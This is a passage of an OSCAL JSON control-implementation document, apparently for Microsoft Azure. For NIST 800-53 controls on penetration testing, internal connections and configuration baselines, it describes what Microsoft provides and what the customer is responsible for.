(3PAO) reaches a consensus to perform the level and detail of testing for the system using assessment test cases and conducting an analysis to determine risk factors and impact._x000D_ * The security assessment tests are designed to evaluate the efficacy of the security controls in place as documented in the system security plan to ensure that the levels of confidentiality, integrity, and availability are in fact supported by the existing in-place or proposed security measures or efforts._x000D_ * The Third Party Assessment Organization (3PAO) develops and approves the Security Assessment Plan, and employs technical and non-technical measures to include, but not limited to, on-site interviews, observations, system testing, and evaluation._x000D_ * The results of the assessment activities performed by the Third Party Assessment Organization (3PAO) include a formal report, which includes work papers that support the conclusions of the security assessment report._x000D_ * Microsoft provides an exit brief of results, prior to report finalization._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cbfe1538-5012-47c5-b47f-c9a381e0567a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-035"}],"description":"The customer is responsible for conducting penetration testing for customer-deployed resources.","provided-uuid":"49f839e4-e89e-4769-a07d-dee3a343edad"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"988f6ce9-146f-4f85-806a-c1d884b2a199","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-8.1","statements":[{"uuid":"df0bde98-1f32-4d55-887f-6a9cef436938","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-036"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-8.1_smt","by-components":[{"uuid":"f788c6fe-09fa-4d5f-b3a0-b80ca9c78121","export":{"provided":[{"uuid":"281d0b57-b425-4d28-ba80-3a3dc70d10f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-036"}],"description":"The Third Party Assessment Organization (3PAO) performs penetration testing on the information system at least annually. The Penetration Test Report covers Azure system components identified as part of the authorization boundary._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ea08c4ca-ab99-457d-9fb2-ed868a9799e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-036"}],"description":"The customer is responsible for employing an independent agent or team to perform penetration testing on customer-deployed resources (note that this may be the 3PAO used for recurring assessments, or it may be a different independent assessor).","provided-uuid":"281d0b57-b425-4d28-ba80-3a3dc70d10f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c66e2154-de96-4803-809f-8b4b02d710b7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-8.2","statements":[{"uuid":"762d6e7c-0423-48cc-8abc-522cfe3a8b90","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-037"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-8.2_smt","by-components":[{"uuid":"e31015b7-42e4-407b-9701-a32c9e49f786","export":{"provided":[{"uuid":"657662df-5345-4911-a777-2253e1f89c4e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-037"}],"description":"Microsoft employs Red Team penetration test activities regularly. This testing is executed with approved penetration testing tools utilized by adversaries to ensure Azure is sufficiently tested against real-world attacks. Including capabilities such as Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinates overt and covert activities to validate and strengthen the global Azure and sovereign infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall compliance certifications."}],"responsibilities":[{"uuid":"778e8d21-72c7-494b-bd37-4e684ca224ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-037"}],"description":"The customer is responsible for employing organization-defined red team exercises to simulate attempts by adversaries to compromise organizational information systems in accordance with organization-defined rules of engagement.","provided-uuid":"657662df-5345-4911-a777-2253e1f89c4e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4a8a75eb-64c0-477e-a45f-d81f2e8bd6b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-9","statements":[{"uuid":"fbe8ddde-5476-4740-9ad7-822f6399e361","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-9_smt.a","by-components":[{"uuid":"e85f6e9a-199b-49f8-bb47-2b1922dcef62","export":{"provided":[{"uuid":"e33ddf7a-a6d2-49b5-8b04-ab483745a9cf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-038"}],"description":"As part of standard configuration management processes, Microsoft authorizes individual assets connected to the environment. Teams generate threat models and/or data flow diagrams which include details of components within and connected to the information system. Microsoft does not connect any constituent components to the Azure environment other than assets provisioned within the environment boundary. Such assets are subsequently considered part of the Azure information system once connected. Azure assets are configured according to Azure baselines."}],"responsibilities":[{"uuid":"ec744e5b-e8e2-41cb-9589-e0aa512f39cc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-038"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for authorizing internal connections across customer-deployed resources (e.g., system connections to VMs).","provided-uuid":"e33ddf7a-a6d2-49b5-8b04-ab483745a9cf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d4eae7a9-f49d-411b-b47e-8553f97fdd5a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-9_smt.b","by-components":[{"uuid":"3ca85678-65df-46f2-adca-3a3c905c3c72","export":{"provided":[{"uuid":"cc13d2d5-bdaf-448d-9aa3-e5aec84bdf8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-039"}],"description":"As part of standard configuration management processes, Microsoft documents interface characteristics and security requirements for individual assets connected to the environment. These documents go through privacy, compliance, and security reviews. To request a change to the host-based firewall, the service team must populate a questionnaire, providing descriptions of the request, requirements, and justification for the change. Depending on the asset classification of data, descriptions may include data types, current compliance with data handling, and any risk assessment or threat analysis the Azure team has conducted in coordination with Privacy, Corporate, External, and Legal Affairs (CELA), or C+AI Security. The Azure team must also provide documentation to help C+AI Security Solutions assess operational risks (e.g. architecture and network diagrams, infrastructure threat models, etc.)."}],"responsibilities":[{"uuid":"f6c36790-6f13-4025-9780-34f11b0a9744","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-039"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for documenting the details of each internal connection between the classes/resources defined in CA-09.a.","provided-uuid":"cc13d2d5-bdaf-448d-9aa3-e5aec84bdf8e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6caec9aa-1896-445b-b260-855d0dc1c7dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-9_smt.c","by-components":[{"uuid":"d7aedb9e-dfe4-4843-8bc8-8548d4d7600d","export":{"provided":[{"uuid":"b1468465-91bd-4430-9ab1-978c8d229e79","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-040"}],"description":"Microsoft does not connect any constituent components to the Azure environment other than assets provisioned within the environment boundary. Such assets are subsequently considered part of the Azure information system once connected. Assets are validated as part of the configuration management process, which includes security compliance checks to ensure the components are validated as approved assets for Azure. Once reviewed, Azure assets or connections that are no longer deemed necessary are removed through the Microsoft change management process."}],"responsibilities":[{"uuid":"8d695b9b-56a7-41ea-98eb-de67e90bb020","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-040"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for terminating internal system connections after a specified condition.","provided-uuid":"b1468465-91bd-4430-9ab1-978c8d229e79"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e71b0ee6-dcf9-4b7f-817d-284f586c4f9f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-9_smt.d","by-components":[{"uuid":"259a7f74-d50e-4b91-a7cc-026f53aaf16f","export":{"provided":[{"uuid":"cb8fccba-f2ed-457d-befa-6dd73ca7c3ba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-041"}],"description":"The Microsoft Change Management Standard specifies that all substantial changes must be reassessed and require review by the change review committee. Where appropriate, a Post-Implementation Review (PIR) may confirm that the change has met its objectives and that there have been no unexpected side-effects."}],"responsibilities":[{"uuid":"89aff978-a439-4495-850e-14ae3fc831e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-041"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing the continued need for each internal connection.","provided-uuid":"cb8fccba-f2ed-457d-befa-6dd73ca7c3ba"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ca4063b0-221d-4e8d-bcec-f81c2665f432","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-2","statements":[{"uuid":"92cc7e2b-88e5-4d57-9f4d-01968079d3b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-2_smt.a","by-components":[{"uuid":"53e72e22-b489-427e-87eb-e51bc79a3c4d","export":{"provided":[{"uuid":"bf46c719-5abf-468e-be9e-6e5c94b166a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-006"}],"description":"Azure establishes and maintains configuration baselines using multiple sources, including: * Existing, updated, and new industry and regulator requirements * New software releases and configuration updates * Customer demand signals * External research findings and internal findings from incident management, penetration testing, security reviews, and other teams who are constantly learning about the operating environment * Compliance team requirements Azure reviews and updates required configuration baselines at least annually. In all cases, changes to the configuration baselines are developed, tested, and approved prior to entering the production environment from a development or test environment. Configuration baselines are maintained under configuration control using Liquid, the Microsoft document repository. Functionally, configuration baselines are reviewed and updated more often as a result of regular updates, reviews, and investigations. Logical images of the baselines are maintained in Azure DevOps. Azure applies configuration baselines differently for hardware and software: for hardware, using the bootstrap configuration process; for software, using the change and release process. Depending on the type of asset, there are different configuration baselines and processes. Servers Server configuration baselines are released and implemented internally via Azure Security Pack (AzSecPack). These configuration baselines are monitored by Azure Security Monitoring (ASM) and SCUBA using the baseline scanning component of AzSecPack. Supported versions of AzSecPack monitor both Windows and Linux operating systems. Additional supported operating systems versions and distributions are evaluated by the ASM team as part of semester planning twice a year and are then added based on business priority and resources. Azure Host, Azure Native, and Azure Guest Servers The RDOS team updates the server configuration baseline for Azure Host, Azure Native, and Azure Guest assets. The server base image is a version in which the kernel and many other core components have been modified to optimize them for the Azure environment. For service teams using Cloud Services, Windows server images are in the form of Virtual Hard Disks (VHDs) that are deployed as Guest VMs in the production environment. For Linux images, service teams use the Secure Base Image (SBI) that has been customized for secure configuration baselines relevant to Azure. Bare Metal and Pilotfish Servers The services running on Bare Metal and Pilotfish servers, including, but not limited to, Jumpboxes, Active Directory, Azure DNS, and other service teams, run standard Windows Server. The configuration baseline image for these assets is provided by the IPAK Engineering Team. IPAK incorporates the security configuration baselines established by the Azure Security Monitoring (ASM) team into the server images and makes those images available for consumption and deployment by engineering teams. Updated IPAK images are released monthly. IPAK documentation is made available to Microsoft personnel on the IPAK internal website, including release notes, install locations, and general IPAK information. Development changes to the IPAK are recorded, tested, and approved prior to implementation, as defined by the standardized change management process. The server is then configured per the role deployment specification by each service team, including the required validation steps prior to the server being released to production. The IPAK engineering team also manages deprecation of old baselines, notifying service team personnel at least twelve (12) months prior to end of life. Changes to the IPAK configurations are made only by appropriate personnel. Network Devices For network devices, the Azure Networking team sets the configuration baseline using recommended configurations specific to each hardware vendor, and makes updates periodically based upon recommendations from the vendor and internal analysis and investigation. For each type of network device, Azure Networking maintains configuration baseline documentation on the Azure Networking Standards and Architecture SharePoint site or in Azure DevOps. The networking configuration baselines are stored in Network Graph Database (NGS). Deployment methods, including reimaging, automated configuration update, scripted configuration change, and manual Method of Procedure (MOP) steps, call data from NGS. NGS provides a code-defined, source-controlled schema with the content to define the configuration baseline for each network device, meaning that the configuration on the device is generated from source regardless of the deployment method used. The network device configuration baseline itself is therefore stateless but the configuration generated from NGS data is, at any point in time, the Gold Configuration of that device. Only the Azure Networking team can make changes to configuration baselines for network devices in Azure. When Azure Networking deploys network devices, the team runs the Config Policy Verifier (CPV) tool before the device goes live on the Azure production environment. CPV verifies the configuration of the device against the Gold Configuration of the appropriate device type. In addition, CPV runs ongoing daily monitoring of all network devices for conformance to the Gold Configuration. Azure Services Azure service teams maintain software assets running on the baselines described above. Each software asset has an established configuration baseline documented in code in a configuration file associated with the asset that is maintained under change control as part of the Change and Release Management processes. Service teams develop, document, and maintain the baselines for each asset in the approved software baseline repository, Azure DevOps. This ensures the baselines remain under configuration control. Changes to the code configuration baselines go through the Security Development Lifecycle (SDL) process, which requires approval from multiple individuals through Ownership Enforcer (OE) or branch policies prior to production deployment. The configuration baseline for ports and protocols allowed for Azure services are monitored by the C+AI Security team via Network Isolation (NetIso). C+AI Security monitors network configurations of Windows and Linux services for internet-exposed management endpoints and high-risk ports and protocols as defined per the C+AI Platform security baseline process."}],"responsibilities":[{"uuid":"92b25653-8e81-4d86-a701-99898425da14","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and maintaining a baseline configuration of customer-deployed resources. If the customer uses a non-Microsoft provided OS on Guest VMs, it is their responsibility to maintain and manage the baseline configuration on that OS. Additionally, it is the customer's responsibility to maintain any application baselines they may have running in Azure.","provided-uuid":"bf46c719-5abf-468e-be9e-6e5c94b166a7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3204082a-0065-48f0-ae90-18d4fe50696d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-008"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-009"}],"statement-id":"cm-2_smt.b","by-components":[{"uuid":"9c670e81-64c7-4269-ae9c-45d611c7e320","export":{"provided":[{"uuid":"a0428194-2880-4a81-92a3-331c9ae2069d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-007"}],"description":"Each configuration baseline team works with the respective imaging team for updates at least annually or when required due to a significant change and as part of new software or component-specific release and upgrade. Changes from United States Cyber Command tactical orders or directives can be accommodated. However, analysis is required to determine if a directive is applicable to the Azure services. There is a reasonable probability that a directive is not applicable. Microsoft internal components are specifically engineered for its operations and do not rely on third-party applications. They are further isolated from direct external connections. They must be further tested to ensure that there is no detrimental impact to the configuration baselines and that the associated vulnerability is not already accommodated by compensating or mitigating controls. All changes must go through the approved deployment process. Additionally, the configuration baselines may be reviewed and updated based on significant change to the Azure environment which may include, but is not limited to the following: * Adding new core missions or business functions * Acquiring specific and credible threat information that the organization is being targeted by a threat source * Establishing new or modified laws, directives, policies, or regulations Servers The Logging and Monitoring team thoroughly reviews and updates the Azure configuration baselines based on new security configurations or changes to existing security configurations of the OS and components at least annually or when a significant change occurs. Additionally, if business priorities require an update to the operating system image as part of the twice per year semester planning the baselines team works the respective imaging team - Azure RDOS team for Azure Host, Native, and Guest images, and IPAK for Bare Metal and Pilotfish - for updates as appropriate. Any updates to images are scheduled as part of the Change and Release Management process. Network Devices For network devices, the Azure Networking team sets the configuration baselines for network devices using recommended configurations specific to each vendor, and these teams make updates at least annually based upon recommendations from the vendors as well as internal testing, requirements, and feedback. Azure Services Azure utilizes a continuous integration and continuous deployment (CI/CD) model for services, ensuring the software baselines are updated regularly - in some cases, multiple times per day. Azure service teams maintain software baselines for each asset in the approved software baseline repository, Azure DevOps. This ensures the baselines remain under configuration control. Changes to configuration baselines go through the Security Development Lifecycle (SDL) process, which requires security signoffs prior to production deployment, among other security."},{"uuid":"ef8f2993-a8d3-4ded-8739-e623eb1f7f1c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-008"}],"description":"Each configuration baseline team works with the respective imaging team for updates at least annually or when required due to a significant change. Changes from United States Cyber Command tactical orders or directives can be accommodated. However, analysis is required to determine if a directive is applicable to the Azure services. There is a reasonable probability that a directive is not applicable. Microsoft internal components are specifically engineered for its operations and do not rely on third-party applications. They are further isolated from direct external connections. They must be further tested to ensure that there is no detrimental impact to the configuration baselines and that the associated vulnerability is not already accommodated by compensating or mitigating controls. All changes must go through the approved deployment process. Additionally, the configuration baselines may be reviewed and updated based on significant change to the Azure environment which may include, but is not limited to the following: * Adding new core missions or business functions * Acquiring specific and credible threat information that the organization is being targeted by a threat source * Establishing new or modified laws, directives, policies, or regulations"},{"uuid":"307b5230-6e9b-4cd5-ad76-03ba7e99b93b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-009"}],"description":"Each configuration baseline team works with the respective imaging team for updates as appropriate to applicable configuration baselines as part of the new software or component-specific release and upgrade."}],"responsibilities":[{"uuid":"ba32e1a7-27e8-4a9b-8a94-dbfd45be04c5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the baseline configuration of customer-deployed resources.","provided-uuid":"a0428194-2880-4a81-92a3-331c9ae2069d"},{"uuid":"ae6f30b9-3ffb-47ee-834d-df21594e5dbd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-008"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the baseline configuration of customer-deployed resources when required by organization-defined circumstances.","provided-uuid":"ef8f2993-a8d3-4ded-8739-e623eb1f7f1c"},{"uuid":"717e87c3-6e6d-46e4-b1d9-22e97ab7194e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the baseline configuration of customer-deployed resources when installations and upgrades occur.","provided-uuid":"307b5230-6e9b-4cd5-ad76-03ba7e99b93b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b370d00e-cb83-4777-b29c-f8e960e39cc1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-2.2","statements":[{"uuid":"dd92ae0a-ab48-4f91-a43e-5998747b1755","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-2.2_smt","by-components":[{"uuid":"debbd79f-7feb-4162-833d-de9b02738c03","export":{"provided":[{"uuid":"623f9297-d2d3-4dba-98dd-b7b266448e45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-010"}],"description":"Servers Configuration baseline information is stored in Azure DevOps, an automated tool that allow Azure to maintain an up-to-date, complete, accurate, and readily available configuration baseline of Azure assets. Network Devices All configuration baselines are stored as abstracted metadata in the network graph database (NGS). NGS is itself managed in a compliant and source-controlled instance of Azure DevOps. Azure Services Configuration baseline information as code is stored in Azure DevOps, an automated tool that allow Azure to maintain an up-to-date, complete, accurate, and readily available configuration baseline of Azure services."}],"responsibilities":[{"uuid":"bffb2903-014b-471c-a144-4de2b385c28d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-010"}],"description":"The customer is responsible for employing automated mechanisms to maintain an up-to-date, complete, accurate, and readily available baseline configuration of customer-deployed resources.","provided-uuid":"623f9297-d2d3-4dba-98dd-b7b266448e45"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"63abaee3-775c-4485-9917-9bbdef4863a6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-2.3","statements":[{"uuid":"2f290db9-6794-4744-92a7-ff9cb6772839","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-2.3_smt","by-components":[{"uuid":"c5f1a3a3-c0e2-462c-9382-f9f5e29bd3c2","export":{"provided":[{"uuid":"ae12d141-76cb-4f16-a9de-150dbee12277","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-011"}],"description":"Azure implements procedures for at least the most recent previous version of the configuration baseline and configuration settings within at least one internal baseline storage solution, in the event information systems need to roll back to a stable version._x000D_ _x000D_ Servers_x000D_ _x000D_ Configuration baselines and configuration settings are available via the Azure DevOps repository history in case a rollback to a previous baseline version is required. Additionally, a copy of the official configuration baseline is published internally to the Liquid requirements catalog that is the authoritative source of requirements authored and maintained by CELA policy owners as well as other groups across the company._x000D_ _x000D_ Network Devices_x000D_ _x000D_ Previous versions of the configuration baselines for network devices are maintained permanently and archived in Network Device Manager (NDM) for at least three (3) months. Network Device Manager is a Microsoft-built software for storing configuration templates. In addition, networking configuration baselines are stored in Network Graph Database (NGS) and Azure DevOps indefinitely._x000D_ _x000D_ Azure Services_x000D_ _x000D_ Service code is stored in Azure DevOps, which retains older versions of code indefinitely._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a6b61dcd-cbeb-4aaf-8728-b1ff019c67a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-011"}],"description":"The customer is responsible for retaining previous versions of baseline configurations for customer-deployed resources.","provided-uuid":"ae12d141-76cb-4f16-a9de-150dbee12277"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1286cbcb-85d7-4a4d-8eb4-d5e99858d138","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-2.7","statements":[{"uuid":"90fd792a-a74d-4b79-9daa-cca8f75db41f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-012"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cm-2.7_smt.a","by-components":[{"uuid":"19378139-8bf8-4bf6-b101-dfb60b03e928","export":{"provided":[{"uuid":"7db8aaf2-3942-4be7-aaf6-50ce62231138","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-012"}],"description":"Azure customer content is never stored outside of Azure, which is physically located within the continental United States. Azure personnel do not travel with devices contained within the Azure inventory."}],"responsibilities":[{"uuid":"6a4ac3b0-471f-424a-82a5-be8a89c861da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-012"}],"description":"The customer is responsible for mobile devices within their environment.","provided-uuid":"7db8aaf2-3942-4be7-aaf6-50ce62231138"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fd57d821-81f4-417d-b7da-11ba6d612eaf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-013"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"cm-2.7_smt.b","by-components":[{"uuid":"e2ed4627-cef2-43b7-987f-7405c98b84b6","export":{"provided":[{"uuid":"6e59c574-7193-4752-a3af-b4c5aa836ff1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-013"}],"description":"Azure customer content is never stored outside of Azure, and Azure personnel do not travel with devices contained within the Azure inventory."}],"responsibilities":[{"uuid":"41ed8528-4a62-4282-a9ce-d724a5f749f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-013"}],"description":"The customer is responsible for mobile devices within their environment.","provided-uuid":"6e59c574-7193-4752-a3af-b4c5aa836ff1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0479395c-15ea-428b-b80f-9456fcac27c1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3","statements":[{"uuid":"f15e891f-a747-44dd-a97f-8e41acec4d2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.a","by-components":[{"uuid":"1c739ae1-9dee-4b3b-ab37-2bb3e5fb8bc6","export":{"provided":[{"uuid":"5b7618d0-ec7c-4a4d-849a-e5218d7c9ea4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-014"}],"description":"Configuration baselines are established based on industry standards, including CIS Benchmarks, DISA STIGs, NSA, various vulnerability library knowledgebases that are configuration related, and vendor recommendations. Configuration baselines undergo through review by security settings baseline experts within Azure, including the Security Assurance team and Microsoft Security Response Center, and other baseline experts across other Microsoft divisions who participate in a Shared Baselines working group. The industry standards and input 